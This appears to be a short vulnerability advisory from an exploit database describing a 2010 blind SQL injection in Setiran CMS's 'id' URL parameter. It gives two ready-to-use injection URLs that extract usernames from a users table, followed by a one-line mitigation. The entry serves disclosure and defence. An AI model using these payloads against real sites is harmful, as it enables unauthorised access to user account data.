vendor:
Setiran CMS
by:
Th3 RDX
7,5
CVSS
HIGH
Blind SQL injection
89
CWE
Product Name: Setiran CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Demo Site
2010
Setiran CMS Blind SQL injection Vulnerable
Setiran CMS is vulnerable to Blind SQL injection. An attacker can inject malicious SQL queries into the vulnerable parameter 'id' in the URL. For example, http://server/Setiran/index.asp?id=1' and 1=convert(int,(select top 1 username from users))-- and http://server/Setiran/?id=522' and 1=convert(int,(select top 1 username from users))-- can be used to inject malicious SQL queries.
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.